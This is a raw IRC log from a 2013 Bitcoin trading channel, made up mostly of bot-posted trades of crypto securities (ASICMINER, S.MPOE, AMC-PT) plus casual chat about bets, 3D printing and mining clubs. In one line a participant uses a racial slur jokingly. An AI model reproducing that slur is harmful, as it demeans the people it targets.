[BTCTC] [TAT.ASICMINER] 1 @ 0.03979 BTC [-] Jun 30 03:03:49 [MPEX] [S.MPOE] 1227 @ 0.00082648 = 1.0141 BTC [+] Jun 30 03:09:45 [HAVELOCK] [ASICM] 5 @ 0.03988 = 0.1994 BTC [-] Jun 30 03:11:43 [HAVELOCK] [SDICE] 6 @ 0.173001 = 1.038 BTC [-] Jun 30 03:13:31 [BTCTC] [TAT.ASICMINER] 82 @ 0.0395 = 3.239 BTC [-] Jun 30 03:15:30 [BTCTC] [DMS.SELLING] 5 @ 0.034468 = 0.1723 BTC [+] Jun 30 03:15:43 [BTCTC] [TAT.ASICMINER] 18 @ 0.039223 = 0.706 BTC [-] Jun 30 03:16:23 [BTCTC] [B.YABMC] 25 @ 0.005001 = 0.125 BTC [-] Jun 30 03:16:25 [BTCTC] [B.YABMC] 1 @ 0.005001 BTC [-] Jun 30 03:16:26 [BTCTC] [B.YABMC] 50 @ 0.005 = 0.25 BTC [-] Jun 30 03:16:28 [BTCTC] [B.YABMC] 74 @ 0.005 = 0.37 BTC [-] Jun 30 03:16:32 [BTCTC] [TAT.ASICMINER] 18 @ 0.039223 = 0.706 BTC [-] Jun 30 03:17:04 [BTCTC] [ASICMINER-PT] 1 @ 3.95 BTC [+] Jun 30 03:19:55 [HAVELOCK] [ASICM] 127 @ 0.03891 = 4.9416 BTC [-] Jun 30 03:19:55 [HAVELOCK] [ASICM] 5 @ 0.0389 = 0.1945 BTC [-] Jun 30 03:19:57 [HAVELOCK] [ASICM] 15 @ 0.03880001 = 0.582 BTC [-] Jun 30 03:19:58 [HAVELOCK] [ASICM] 5 @ 0.0388 = 0.194 BTC [-] Jun 30 03:19:59 [HAVELOCK] [ASICM] 5 @ 0.0387 = 0.1935 BTC [-] Jun 30 03:20:00 [HAVELOCK] [ASICM] 4 @ 0.0386 = 0.1544 BTC [-] Jun 30 03:20:01 [HAVELOCK] [ASICM] 14 @ 0.03851 = 0.5391 BTC [-] Jun 30 03:20:02 [HAVELOCK] [ASICM] 4 @ 0.0385 = 0.154 BTC [-] Jun 30 03:20:03 [HAVELOCK] [ASICM] 5 @ 0.0385 = 0.1925 BTC [-] Jun 30 03:20:05 [HAVELOCK] [ASICM] 1 @ 0.03801 BTC [-] Jun 30 03:31:17 [BTCTC] [DMS.MINING] 2 @ 0.022998 = 0.046 BTC [+] Jun 30 03:32:10 [BTCTC] [S.MPOE-PT] 100 @ 0.001 = 0.1 BTC [+] Jun 30 03:33:24 [MPEX] [S.MPOE] 23050 @ 0.00082618 = 19.0434 BTC [-] Jun 30 03:33:37 [MPEX] [S.MPOE] 2824 @ 0.0008247 = 2.329 BTC [-] Jun 30 03:33:45 [BTCTC] [TAT.ASICMINER] 25 @ 0.039699 = 0.9925 BTC [+] Jun 30 03:37:42 [BTCTC] [PAJKA.BOND] 1 @ 0.05681 BTC [+] Jun 30 03:37:48 [BTCTC] [TAT.ASICMINER] 10 @ 0.039699 = 0.397 BTC [+] Jun 30 03:41:21 [BTCTC] [TAT.ASICMINER] 1 @ 0.039699 BTC [+] Jun 30 03:41:23 [BTCTC] [TAT.ASICMINER] 32 @ 0.0397 = 1.2704 BTC [+] Jun 30 03:41:24 [BTCTC] [TAT.ASICMINER] 8 @ 0.03979 = 0.3183 BTC [+] Jun 30 03:41:53 [BTCTC] [TAT.ASICMINER] 1 @ 0.03979 BTC [+] Jun 30 03:42:46 [BTCTC] [DMS.MINING] 150 @ 0.023 = 3.45 BTC [+] Jun 30 03:43:38 [BTCTC] [S.MPOE-PT] 28 @ 0.001 = 0.028 BTC [+] Jun 30 03:44:46 [BTCTC] [RSM] 5 @ 0.019979 = 0.0999 BTC [+] Jun 30 03:44:55 [HAVELOCK] [ASICM] 50 @ 0.03925 = 1.9625 BTC [+] Jun 30 03:46:15 [HAVELOCK] [ASICM] 119 @ 0.03925 = 4.6708 BTC [+] Jun 30 03:47:30 [HAVELOCK] [ASICM] 50 @ 0.0377 = 1.885 BTC [-] Jun 30 03:47:31 [HAVELOCK] [ASICM] 50 @ 0.037623 = 1.8812 BTC [-] Jun 30 03:47:32 [HAVELOCK] [ASICM] 63 @ 0.03762201 = 2.3702 BTC [-] Jun 30 03:47:34 [HAVELOCK] [ASICM] 17 @ 0.03762101 = 0.6396 BTC [-] Jun 30 03:52:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.03979 = 0.199 BTC [+] Jun 30 03:58:38 [BTCTC] [TAT.ASICMINER] 3 @ 0.03979 = 0.1194 BTC [+] Jun 30 04:01:07 [BTCTC] [DMS.PURCHASE] 50 @ 0.053474 = 2.6737 BTC [+] Jun 30 04:03:22 [BTCTC] [TAT.ASICMINER] 2 @ 0.03979 = 0.0796 BTC [+] Jun 30 04:03:24 [BTCTC] [TAT.ASICMINER] 13 @ 0.0398 = 0.5174 BTC [+] Jun 30 04:06:08 http://bitbet.us/bet/376/bfl-will-stop-giving-refunds-on-bitforce-sc/ Jun 30 04:06:09 just in time huh Jun 30 04:06:10 [BTCTC] [S.MPOE-PT] 1 @ 0.001 BTC [+] Jun 30 04:06:12 BitBet - BFL will stop giving refunds on Bitforce SC ASIC pre-orders before July 2013 Jun 30 04:09:27 [BTCTC] [BASIC-MINING] 2 @ 0.168997 = 0.338 BTC [-] Jun 30 04:15:25 [HAVELOCK] [ASICM] 13 @ 0.038899 = 0.5057 BTC [+] Jun 30 04:16:44 [BTCTC] [ASICMINER-PT] 1 @ 3.94 BTC [-] Jun 30 04:18:10 [HAVELOCK] [ASICM] 7 @ 0.038 = 0.266 BTC [-] Jun 30 04:18:20 [HAVELOCK] [ASICM] 50 @ 0.039239 = 1.962 BTC [+] Jun 30 04:18:30 [HAVELOCK] [ASICM] 1 @ 0.03924 BTC [+] Jun 30 04:21:29 [BTCTC] [BASIC-MINING] 5 @ 0.167489 = 0.8374 BTC [-] Jun 30 04:30:34 [MPEX] [S.MPOE] 7100 @ 0.00082209 = 5.8368 BTC [-] Jun 30 04:32:12 [BTCTC] [AMC-PT] 100 @ 0.001018 = 0.1018 BTC [+] Jun 30 04:32:15 [BTCTC] [AMC-PT] 1800 @ 0.001017 = 1.8306 BTC [-] Jun 30 04:33:44 [BTCTC] [TAT.ASICMINER] 20 @ 0.0398 = 0.796 BTC [+] Jun 30 04:42:36 [BTCTC] [AMC-PT] 20 @ 0.00119 = 0.0238 BTC [+] Jun 30 04:47:58 [HAVELOCK] [ASICM] 7 @ 0.0398788 = 0.2792 BTC [+] Jun 30 04:52:21 do people actually use irc bots Jun 30 04:52:26 for this kind of info? Jun 30 04:53:28 [BTCTC] [TAT.ASICMINER] 1 @ 0.0395 BTC [-] Jun 30 04:53:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0395 BTC [-] Jun 30 04:53:32 [BTCTC] [TAT.ASICMINER] 2 @ 0.0394 = 0.0788 BTC [-] Jun 30 04:55:30 poggy say wut ? Jun 30 04:55:44 like Jun 30 04:56:07 do people actually use the stuff assbot is coming out with Jun 30 04:57:22 nah Jun 30 04:57:53 [BTCTC] [ASICMINER-PT] 1 @ 3.938 BTC [-] Jun 30 04:59:22 [BTCTC] [TAT.ASICMINER] 1 @ 0.0398 BTC [+] Jun 30 05:01:38 [BTCTC] [BASIC-MINING] 13 @ 0.167443 = 2.1768 BTC [-] Jun 30 05:02:27 [BTCTC] [BASIC-MINING] 10 @ 0.167445 = 1.6745 BTC [+] Jun 30 05:03:07 [BTCTC] [BASIC-MINING] 2 @ 0.1675 = 0.335 BTC [+] Jun 30 05:03:26 [BTCTC] [AMC-PT] 400 @ 0.001017 = 0.4068 BTC [-] Jun 30 05:03:28 [BTCTC] [AMC-PT] 1000 @ 0.001015 = 1.015 BTC [-] Jun 30 05:03:29 [BTCTC] [AMC-PT] 200 @ 0.001012 = 0.2024 BTC [-] Jun 30 05:03:30 [BTCTC] [AMC-PT] 500 @ 0.001001 = 0.5005 BTC [-] Jun 30 05:04:16 [BTCTC] [BASIC-MINING] 4 @ 0.17 = 0.68 BTC [+] Jun 30 05:05:51 [BTCTC] [ASICMINER-PT] 1 @ 3.938999 BTC [+] Jun 30 05:06:09 [BTCTC] [DMS.MINING] 9 @ 0.022991 = 0.2069 BTC [-] Jun 30 05:06:22 [BTCTC] [ASICMINER-PT] 1 @ 3.939 BTC [+] Jun 30 05:08:25 [BTCTC] [TAT.ASICMINER] 8 @ 0.0398 = 0.3184 BTC [+] Jun 30 05:09:18 [BTCTC] [DMS.MINING] 8 @ 0.023195 = 0.1856 BTC [+] Jun 30 05:09:20 [BTCTC] [DMS.MINING] 63 @ 0.023196 = 1.4613 BTC [+] Jun 30 05:10:11 [BTCTC] [ASICMINER-PT] 9 @ 3.939999 = 35.46 BTC [+] Jun 30 05:10:29 [BTCTC] [BASIC-MINING] 17 @ 0.17 = 2.89 BTC [+] Jun 30 05:10:37 [BTCTC] [ASICMINER-PT] 5 @ 3.94 = 19.7 BTC [+] Jun 30 05:11:03 [BTCTC] [ASICMINER-PT] 7 @ 3.95 = 27.65 BTC [+] Jun 30 05:11:33 [BTCTC] [ASICMINER-PT] 1 @ 3.9689 BTC [+] Jun 30 05:12:10 [BTCTC] [ASICMINER-PT] 2 @ 3.969 = 7.938 BTC [+] Jun 30 05:12:41 [BTCTC] [ASICMINER-PT] 1 @ 3.97 BTC [+] Jun 30 05:13:15 [MPEX] [O.USD.P101T] 1 @ 0.60581107 BTC [+] Jun 30 05:14:38 [MPEX] [O.USD.C101T] 1 @ 0.34746901 BTC [+] Jun 30 05:17:53 [BTCTC] [TAT.ASICMINER] 2 @ 0.039799 = 0.0796 BTC [-] Jun 30 05:19:05 [BTCTC] [AMC-PT] 20 @ 0.00119 = 0.0238 BTC [+] Jun 30 05:25:03 [BTCTC] [TAT.ASICMINER] 26 @ 0.03975 = 1.0335 BTC [-] Jun 30 05:25:58 [BTCTC] [DMS.SELLING] 20 @ 0.031281 = 0.6256 BTC [-] Jun 30 05:26:11 [BTCTC] [TAT.ASICMINER] 19 @ 0.03975 = 0.7553 BTC [-] Jun 30 05:26:56 [BTCTC] [DMS.SELLING] 40 @ 0.03128 = 1.2512 BTC [-] Jun 30 05:27:51 [BTCTC] [DMS.SELLING] 17 @ 0.03128 = 0.5318 BTC [-] Jun 30 05:27:55 [BTCTC] [AMC-PT] 360 @ 0.00119 = 0.4284 BTC [+] Jun 30 05:27:57 [BTCTC] [AMC-PT] 500 @ 0.00119 = 0.595 BTC [+] Jun 30 05:29:04 [BTCTC] [AMC-PT] 276 @ 0.0012 = 0.3312 BTC [+] Jun 30 05:29:05 [BTCTC] [AMC-PT] 100 @ 0.0012 = 0.12 BTC [+] Jun 30 05:29:07 [BTCTC] [ASICMINER-PT] 5 @ 3.97 = 19.85 BTC [+] Jun 30 05:29:09 [BTCTC] [ASICMINER-PT] 1 @ 3.977 BTC [+] Jun 30 05:30:05 [BTCTC] [AMC-PT] 500 @ 0.00125 = 0.625 BTC [+] Jun 30 05:30:21 [BTCTC] [ASICMINER-PT] 1 @ 3.977 BTC [+] Jun 30 05:31:01 [BTCTC] [AMC-PT] 200 @ 0.0013 = 0.26 BTC [+] Jun 30 05:35:25 [BTCTC] [TAT.ASICMINER] 1 @ 0.0395 BTC [-] Jun 30 05:35:27 [BTCTC] [TAT.ASICMINER] 1 @ 0.0394 BTC [-] Jun 30 05:35:36 [BTCTC] [TAT.ASICMINER] 5 @ 0.03978 = 0.1989 BTC [+] Jun 30 05:38:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.0393 = 0.1965 BTC [-] Jun 30 05:40:05 [BTCTC] [B.YABMC] 10 @ 0.00569 = 0.0569 BTC [+] Jun 30 05:43:42 [BTCTC] [ASICMINER-PT] 2 @ 3.976 = 7.952 BTC [-] Jun 30 05:44:40 [BTCTC] [S.DICE-PT] 1 @ 0.002249 BTC [+] Jun 30 05:46:05 [BTCTC] [TAT.ASICMINER] 3 @ 0.03978 = 0.1193 BTC [+] Jun 30 05:46:07 [BTCTC] [TAT.ASICMINER] 80 @ 0.039789 = 3.1831 BTC [+] Jun 30 05:46:09 [BTCTC] [TAT.ASICMINER] 4 @ 0.03979 = 0.1592 BTC [+] Jun 30 05:46:37 [BTCTC] [BASIC-MINING] 1 @ 0.161501 BTC [-] Jun 30 05:52:43 [BTCTC] [ASICMINER-PT] 2 @ 3.976 = 7.952 BTC [-] Jun 30 05:54:09 [BTCTC] [ASICMINER-PT] 1 @ 3.976 BTC [-] Jun 30 05:55:55 [HAVELOCK] [ASICM] 1 @ 0.03925 BTC [-] Jun 30 05:58:49 [BTCTC] [B.YABMC] 1 @ 0.0055 BTC [-] Jun 30 05:58:51 [BTCTC] [B.YABMC] 26 @ 0.005 = 0.13 BTC [-] Jun 30 05:59:11 [BTCTC] [CRYPTO-TRADE] 3 @ 0.199 = 0.597 BTC [-] Jun 30 06:00:27 [HAVELOCK] [ASICM] 9 @ 0.03925 = 0.3533 BTC [-] Jun 30 06:00:36 http://www.theverge.com/2013/6/29/4477428/3d-printed-cortex-cast-puts-modern-spin-on-bone-fracture Jun 30 06:00:39 3D-printed 'Cortex' cast concept puts a modern spin on bone fracture treatment | The Verge Jun 30 06:00:54 how do they get it on? Jun 30 06:03:22 good point Jun 30 06:04:12 the guys name is evill, so maybe you have to ram your broken arm into it Jun 30 06:05:39 ram your arm into a 3D printer Jun 30 06:05:50 hah Jun 30 06:06:13 3d printer powered by arm Jun 30 06:09:32 i broke my foot once, and i had a cast from my toes to just below the knee. it would be bad to try to slide that on. it would be better if it was an upper and a lower part that clasps together. Jun 30 06:10:07 3D printing is in its early stages, but i have high hopes for this technology Jun 30 06:10:24 [BTCTC] [ASICMINER-PT] 1 @ 3.976 BTC [-] Jun 30 06:11:04 [BTCTC] [AMC-PT] 150 @ 0.0013 = 0.195 BTC [+] Jun 30 06:11:06 [BTCTC] [AMC-PT] 200 @ 0.0013 = 0.26 BTC [+] Jun 30 06:13:16 good friend of mine built a 3d printer by printing a lot of the parts on another friends 3d printer Jun 30 06:14:20 [BTCTC] [ASICMINER-PT] 1 @ 3.925001 BTC [-] Jun 30 06:14:26 sounds about par. my buddy did something similar to that too about a year ago. Jun 30 06:15:47 [BTCTC] [TAT.ASICMINER] 6 @ 0.03979 = 0.2387 BTC [+] Jun 30 06:16:35 he didnt use it enough, i kept offering to take it off his hands but he never went for it. moved to the other side of the country a few months ago Jun 30 06:17:58 [MPEX] [S.MPOE] 2900 @ 0.00082109 = 2.3812 BTC [-] Jun 30 06:18:00 [MPEX] [S.MPOE] 8900 @ 0.00082218 = 7.3174 BTC [+] Jun 30 06:22:17 [BTCTC] [AMC-PT] 25 @ 0.0013 = 0.0325 BTC [+] Jun 30 06:22:40 [BTCTC] [DMS.MINING] 20 @ 0.022002 = 0.44 BTC [-] Jun 30 06:22:57 [HAVELOCK] [ASICM] 1 @ 0.03925 BTC [-] Jun 30 06:23:46 [BTCTC] [DMS.MINING] 8 @ 0.020011 = 0.1601 BTC [-] Jun 30 06:23:48 [BTCTC] [DMS.MINING] 14 @ 0.02001 = 0.2801 BTC [-] Jun 30 06:23:49 [BTCTC] [DMS.MINING] 50 @ 0.02001 = 1.0005 BTC [-] Jun 30 06:23:50 [BTCTC] [DMS.MINING] 67 @ 0.02001 = 1.3407 BTC [-] Jun 30 06:24:23 nasty mining got 5 singles Jun 30 06:24:42 zoom? Jun 30 06:25:11 straight to the moon Jun 30 06:25:16 kewl Jun 30 06:26:21 actualy it hasnt moved yet Jun 30 06:27:20 oh, heh, think i misunderstood Jun 30 06:28:27 is not a single if its 5 of em Jun 30 06:29:35 yes it is Jun 30 06:29:53 NO U Jun 30 06:29:56 [BTCTC] [AMC-PT] 600 @ 0.0013 = 0.78 BTC [+] Jun 30 06:30:01 ;;bc,stats Jun 30 06:30:03 Current Blocks: 244020 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1931 blocks | Next Difficulty In About: 1 week, 4 days, 7 hours, 1 minute, and 3 seconds | Next Difficulty Estimate: 23825406.3136 | Estimated Percent Change: 11.67115 Jun 30 06:30:06 whats the symbol on that? Jun 30 06:30:24 on what Jun 30 06:30:36 nasty? Jun 30 06:30:39 there is none Jun 30 06:30:47 the nasty mining (i don't really follow the miner orgs as much) Jun 30 06:31:08 they only operate through their own exchange system Jun 30 06:31:12 [BTCTC] [AMC-PT] 200 @ 0.0013 = 0.26 BTC [+] Jun 30 06:31:13 oh, iirc there used to be?? but maybe that was on GLBSE (lol) Jun 30 06:31:18 https://nastyfans.org/ Jun 30 06:31:21 sign in Jun 30 06:31:28 hey dont you be dissing my nigga nefario Jun 30 06:31:42 hahaha Jun 30 06:31:50 it's like .53 now Jun 30 06:32:08 ah Jun 30 06:32:30 [MPEX] [S.MPOE] 7057 @ 0.00082218 = 5.8021 BTC [+] Jun 30 06:32:33 was .28 1 month ago Jun 30 06:37:59 [HAVELOCK] [ASICM] 80 @ 0.03925 = 3.14 BTC [-] Jun 30 06:39:34 [MPEX] [S.MPOE] 8967 @ 0.00082502 = 7.398 BTC [+] Jun 30 06:39:36 [MPEX] [S.MPOE] 7465 @ 0.00082517 = 6.1599 BTC [+] Jun 30 06:39:46 [MPEX] [S.MPOE] 1715 @ 0.00082763 = 1.4194 BTC [+] Jun 30 06:39:52 [MPEX] [S.MPOE] 11903 @ 0.00082807 = 9.8565 BTC [+] Jun 30 06:41:54 its not an exchange its a fan club Jun 30 06:42:12 [BTCTC] [ASICMINER-PT] 1 @ 3.92 BTC [-] Jun 30 06:43:23 im already a member of michael jackson fan club Jun 30 06:43:29 very good returns Jun 30 06:43:57 diversivied into new kids on the block Jun 30 06:44:00 [BTCTC] [AMC-PT] 127 @ 0.0013 = 0.1651 BTC [+] Jun 30 06:44:41 [BTCTC] [ASICMINER-PT] 1 @ 3.9101 BTC [-] Jun 30 06:51:37 bwahaha Jun 30 06:51:46 dude pigeons doesn't say much, but when he does... Jun 30 06:52:02 Dangerous For Coffee. Jun 30 06:58:35 i had forgotten about the whole "fan-club" work-around idea. haha. Jun 30 07:00:46 perhaps i blocked it out. Jun 30 07:01:07 [BTCTC] [ASICMINER-PT] 1 @ 3.944999 BTC [+] Jun 30 07:01:50 [BTCTC] [ASICMINER-PT] 2 @ 3.945 = 7.89 BTC [+] Jun 30 07:02:11 [BTCTC] [AMC-PT] 1500 @ 0.0013 = 1.95 BTC [+] Jun 30 07:05:13 [BTCTC] [TAT.ASICMINER] 25 @ 0.03979 = 0.9948 BTC [+] **** BEGIN LOGGING AT Sun Jun 30 16:37:42 2013 Jun 30 16:37:42 [BTCTC] [TAT.ASICMINER] 3 @ 0.042 = 0.126 BTC [-] Jun 30 16:39:58 [BTCTC] [BITVPS] 10 @ 0.00115 = 0.0115 BTC [+] Jun 30 16:41:39 [HAVELOCK] [ASICM] 1 @ 0.0429999 BTC [+] Jun 30 16:47:06 [MPEX] [S.MPOE] 16408 @ 0.00083042 = 13.6255 BTC [-] Jun 30 16:48:11 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005 = 0.01 BTC [+] Jun 30 16:52:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.0419 = 0.1257 BTC [-] Jun 30 16:52:53 [HAVELOCK] [HIM] 20 @ 0.299999 = 6 BTC [-] Jun 30 16:53:01 [HAVELOCK] [HIM] 3 @ 0.3 = 0.9 BTC [+] Jun 30 16:53:03 [BTCTC] [S.MPOE-PT] 1 @ 0.000999 BTC [-] Jun 30 16:53:03 http://www.techdirt.com/articles/20130328/14080622496/now-canada-wants-activist-investors-to-share-with-rest-class.shtml Jun 30 16:53:05 le lol. Jun 30 16:53:07 Now Canada Wants Activist Investors To Share With The Rest Of The Class | Techdirt Jun 30 16:54:09 [HAVELOCK] [ASICM] 25 @ 0.0429 = 1.0725 BTC [-] Jun 30 16:55:01 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.00527 = 0.0527 BTC [+] Jun 30 16:57:27 [HAVELOCK] [ASICM] 1 @ 0.042 BTC [-] Jun 30 16:57:31 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005 BTC [-] Jun 30 16:58:21 [HAVELOCK] [HIM] 12 @ 0.285101 = 3.4212 BTC [-] Jun 30 16:58:43 [HAVELOCK] [ASICM] 99 @ 0.042 = 4.158 BTC [-] Jun 30 17:00:29 [BTCTC] [TAT.ASICMINER] 23 @ 0.041899 = 0.9637 BTC [-] Jun 30 17:01:23 [BTCTC] [CRYPTO-TRADE] 10 @ 0.2 = 2 BTC [+] Jun 30 17:01:59 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.005269 = 0.2635 BTC [+] Jun 30 17:05:14 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00528 = 0.0211 BTC [+] Jun 30 17:05:19 [BTCTC] [TAT.VIRTUALMINE] 61 @ 0.00528 = 0.3221 BTC [+] Jun 30 17:06:35 [BTCTC] [ASICMINER-PT] 1 @ 4.249 BTC [-] Jun 30 17:06:37 [BTCTC] [ASICMINER-PT] 1 @ 4.25 BTC [+] Jun 30 17:06:39 [BTCTC] [ASICMINER-PT] 5 @ 4.25 = 21.25 BTC [+] Jun 30 17:07:32 [BTCTC] [B.YABMC] 1 @ 0.005 BTC [-] Jun 30 17:07:47 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.005499 BTC [+] Jun 30 17:08:20 [BTCTC] [ASICMINER-PT] 1 @ 4.256 BTC [+] Jun 30 17:08:22 [BTCTC] [ASICMINER-PT] 5 @ 4.25699 = 21.285 BTC [+] Jun 30 17:08:24 [BTCTC] [ASICMINER-PT] 4 @ 4.257 = 17.028 BTC [+] Jun 30 17:08:59 [BTCTC] [ASICMINER-PT] 13 @ 4.257 = 55.341 BTC [+] Jun 30 17:09:25 [BTCTC] [ASICMINER-PT] 1 @ 4.257 BTC [+] Jun 30 17:18:04 [HAVELOCK] [ASICM] 21 @ 0.04285 = 0.8999 BTC [+] Jun 30 17:18:32 [BTCTC] [ASICMINER-PT] 1 @ 4.256 BTC [-] Jun 30 17:18:34 [BTCTC] [ASICMINER-PT] 1 @ 4.257 BTC [+] Jun 30 17:18:36 [BTCTC] [ASICMINER-PT] 2 @ 4.258 = 8.516 BTC [+] Jun 30 17:18:38 [BTCTC] [ASICMINER-PT] 4 @ 4.2591 = 17.0364 BTC [+] Jun 30 17:19:14 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.005497 = 0.011 BTC [-] Jun 30 17:20:43 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0051 = 0.51 BTC [-] Jun 30 17:21:13 [BTCTC] [TAT.ASICMINER] 7 @ 0.041899 = 0.2933 BTC [-] Jun 30 17:24:50 [BTCTC] [ASICMINER-PT] 2 @ 4.258 = 8.516 BTC [-] Jun 30 17:27:42 [BTCTC] [CRYPTO-TRADE] 4 @ 0.2 = 0.8 BTC [+] Jun 30 17:32:12 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.0051 = 0.255 BTC [-] Jun 30 17:38:08 [BTCTC] [TAT.ASICMINER] 1 @ 0.041799 BTC [-] Jun 30 17:39:12 [BTCTC] [DMS.MINING] 7 @ 0.019897 = 0.1393 BTC [+] Jun 30 17:40:31 [BTCTC] [TAT.ASICMINER] 15 @ 0.041799 = 0.627 BTC [-] Jun 30 17:41:06 [BTCTC] [TAT.ASICMINER] 10 @ 0.0418 = 0.418 BTC [+] Jun 30 17:48:25 [BTCTC] [TAT.ASICMINER] 5 @ 0.0425 = 0.2125 BTC [+] Jun 30 17:48:30 [BTCTC] [TAT.VIRTUALMINE] 38 @ 0.004113 = 0.1563 BTC [-] Jun 30 17:48:32 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.004113 = 0.0165 BTC [-] Jun 30 17:48:33 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0041 = 0.0082 BTC [-] Jun 30 17:48:34 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.004 BTC [-] Jun 30 17:48:36 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004 = 0.08 BTC [-] Jun 30 17:48:36 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004 = 0.08 BTC [-] Jun 30 17:48:37 [BTCTC] [TAT.VIRTUALMINE] 20 @ 0.004 = 0.08 BTC [-] Jun 30 17:48:38 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.004 = 0.4 BTC [-] Jun 30 17:48:39 [BTCTC] [TAT.VIRTUALMINE] 100 @ 0.0038 = 0.38 BTC [-] Jun 30 17:48:41 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.0038 = 0.038 BTC [-] Jun 30 17:48:42 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003751 = 0.0375 BTC [-] Jun 30 17:48:43 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00342 = 0.0103 BTC [-] Jun 30 17:48:44 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00341 = 0.0102 BTC [-] Jun 30 17:48:45 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00341 = 0.0102 BTC [-] Jun 30 17:48:46 [BTCTC] [TAT.VIRTUALMINE] 4 @ 0.00341 = 0.0136 BTC [-] Jun 30 17:48:46 [BTCTC] [TAT.VIRTUALMINE] 6 @ 0.00341 = 0.0205 BTC [-] Jun 30 17:48:48 [BTCTC] [TAT.VIRTUALMINE] 17 @ 0.003405 = 0.0579 BTC [-] Jun 30 17:48:49 [BTCTC] [TAT.VIRTUALMINE] 90 @ 0.0033 = 0.297 BTC [-] Jun 30 17:48:50 [BTCTC] [TAT.VIRTUALMINE] 49 @ 0.0032 = 0.1568 BTC [-] Jun 30 17:48:51 [BTCTC] [ASICMINER-PT] 5 @ 4.2591 = 21.2955 BTC [+] Jun 30 17:49:43 [BTCTC] [ASICMINER-PT] 7 @ 4.295 = 30.065 BTC [+] Jun 30 17:51:14 [BTCTC] [TAT.ASICMINER] 15 @ 0.0433 = 0.6495 BTC [+] Jun 30 17:51:30 [BTCTC] [AMC-PT] 345 @ 0.001123 = 0.3874 BTC [+] Jun 30 17:51:32 [BTCTC] [AMC-PT] 1 @ 0.001123 BTC [+] Jun 30 17:51:33 [BTCTC] [AMC-PT] 500 @ 0.001122 = 0.561 BTC [-] Jun 30 17:51:35 [BTCTC] [AMC-PT] 1154 @ 0.001121 = 1.2936 BTC [-] Jun 30 17:55:01 [BTCTC] [ASICMINER-PT] 1 @ 4.295 BTC [+] Jun 30 17:55:18 [BTCTC] [ASICMINER-PT] 1 @ 4.299 BTC [+] Jun 30 17:56:08 [BTCTC] [B.YABMC] 11 @ 0.005 = 0.055 BTC [-] Jun 30 17:59:12 [HAVELOCK] [HIM] 3 @ 0.3 = 0.9 BTC [+] Jun 30 18:01:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.0433 = 0.433 BTC [+] Jun 30 18:02:31 ;;bcstats Jun 30 18:02:33 Current Blocks: 244101 | Current Difficulty: 2.1335329113983E7 | Next Difficulty At Block: 245951 | Next Difficulty In: 1850 blocks | Next Difficulty In About: 1 week, 4 days, 6 hours, 43 minutes, and 54 seconds | Next Difficulty Estimate: 23972938.4825 | Estimated Percent Change: 12.36264 Jun 30 18:03:53 [BTCTC] [TAT.ASICMINER] 100 @ 0.043 = 4.3 BTC [-] Jun 30 18:03:55 [BTCTC] [TAT.VIRTUALMINE] 3 @ 0.00355 = 0.0107 BTC [+] Jun 30 18:04:28 [HAVELOCK] [ASICM] 10 @ 0.04284 = 0.4284 BTC [-] Jun 30 18:04:30 [HAVELOCK] [ASICM] 79 @ 0.04285 = 3.3852 BTC [+] Jun 30 18:04:31 [HAVELOCK] [ASICM] 100 @ 0.04289 = 4.289 BTC [+] Jun 30 18:04:32 [HAVELOCK] [ASICM] 161 @ 0.0429 = 6.9069 BTC [+] Jun 30 18:04:51 [HAVELOCK] [ASICM] 9 @ 0.0429 = 0.3861 BTC [+] Jun 30 18:05:16 [BTCTC] [DMS.SELLING] 16 @ 0.034999 = 0.56 BTC [+] Jun 30 18:05:17 [BTCTC] [ASICMINER-PT] 1 @ 4.3 BTC [+] Jun 30 18:05:21 [BTCTC] [DMS.SELLING] 2 @ 0.035 = 0.07 BTC [+] Jun 30 18:05:39 [BTCTC] [TAT.ASICMINER] 10 @ 0.043 = 0.43 BTC [-] Jun 30 18:06:01 [BTCTC] [DMS.MINING] 13 @ 0.019897 = 0.2587 BTC [+] Jun 30 18:06:02 [BTCTC] [DMS.MINING] 7 @ 0.019898 = 0.1393 BTC [+] Jun 30 18:07:06 [HAVELOCK] [ASICM] 10 @ 0.0429 = 0.429 BTC [+] Jun 30 18:07:39 [HAVELOCK] [ASICM] 70 @ 0.0429 = 3.003 BTC [+] Jun 30 18:08:31 [BTCTC] [ASICMINER-PT] 1 @ 4.200001 BTC [-] Jun 30 18:08:33 [BTCTC] [ASICMINER-PT] 4 @ 4.2 = 16.8 BTC [-] Jun 30 18:10:01 [BTCTC] [TAT.ASICMINER] 30 @ 0.04251 = 1.2753 BTC [-] Jun 30 18:10:03 [BTCTC] [TAT.ASICMINER] 4 @ 0.0425 = 0.17 BTC [-] Jun 30 18:11:35 [BTCTC] [TAT.ASICMINER] 1 @ 0.043 BTC [+] Jun 30 18:11:42 [BTCTC] [AMC-PT] 300 @ 0.001122 = 0.3366 BTC [+] Jun 30 18:12:02 [HAVELOCK] [ASICM] 20 @ 0.0429999 = 0.86 BTC [+] Jun 30 18:12:55 [MPEX] [S.MPOE] 10900 @ 0.00083042 = 9.0516 BTC [-] Jun 30 18:14:13 [HAVELOCK] [ASICM] 16 @ 0.0429999 = 0.688 BTC [+] Jun 30 18:15:09 [HAVELOCK] [ASICM] 1 @ 0.0429999 BTC [+] Jun 30 18:21:20 [BTCTC] 